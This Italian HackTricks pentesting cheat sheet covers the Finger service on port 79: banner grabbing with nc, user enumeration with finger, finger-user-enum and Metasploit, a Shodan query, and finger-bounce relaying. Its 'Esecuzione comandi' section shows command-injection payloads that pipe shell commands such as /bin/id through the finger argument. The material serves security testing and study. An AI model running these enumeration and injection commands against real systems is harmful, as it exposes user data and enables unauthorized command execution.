57 lines
1.8 KiB
Markdown

# 79 - Pentesting Finger
{{#include ../banners/hacktricks-training.md}}
## **Informazioni di base**
Il programma/servizio **Finger** è utilizzato per recuperare dettagli sugli utenti del computer. Tipicamente, le informazioni fornite includono il **nome utente, nome completo**, e, in alcuni casi, dettagli aggiuntivi. Questi dettagli extra potrebbero comprendere la posizione dell'ufficio e il numero di telefono (se disponibile), l'ora in cui l'utente ha effettuato l'accesso, il periodo di inattività (tempo di inattività), l'ultima volta che la posta è stata letta dall'utente e i contenuti dei file di piano e progetto dell'utente.
**Porta predefinita:** 79
```
PORT STATE SERVICE
79/tcp open finger
```
## **Enumerazione**
### **Acquisizione del banner/Connessione di base**
```bash
nc -vn <IP> 79
echo "root" | nc -vn <IP> 79
```
### **Enumerazione degli utenti**
```bash
finger @<Victim> #List users
finger admin@<Victim> #Get info of user
finger user@<Victim> #Get info of user
```
In alternativa, puoi utilizzare **finger-user-enum** da [**pentestmonkey**](http://pentestmonkey.net/tools/user-enumeration/finger-user-enum), alcuni esempi:
```bash
finger-user-enum.pl -U users.txt -t 10.0.0.1
finger-user-enum.pl -u root -t 10.0.0.1
finger-user-enum.pl -U users.txt -T ips.txt
```
#### **Nmap esegue uno script utilizzando script predefiniti**
### Metasploit utilizza più trucchi di Nmap
```
use auxiliary/scanner/finger/finger_users
```
### Shodan
- `port:79 USER`
## Esecuzione comandi
```bash
finger "|/bin/id@example.com"
finger "|/bin/ls -a /@example.com"
```
## Finger Bounce
[Usa un sistema come relay finger](https://securiteam.com/exploits/2BUQ2RFQ0I/)
```
finger user@host@victim
finger @internal@external
```
{{#include ../banners/hacktricks-training.md}}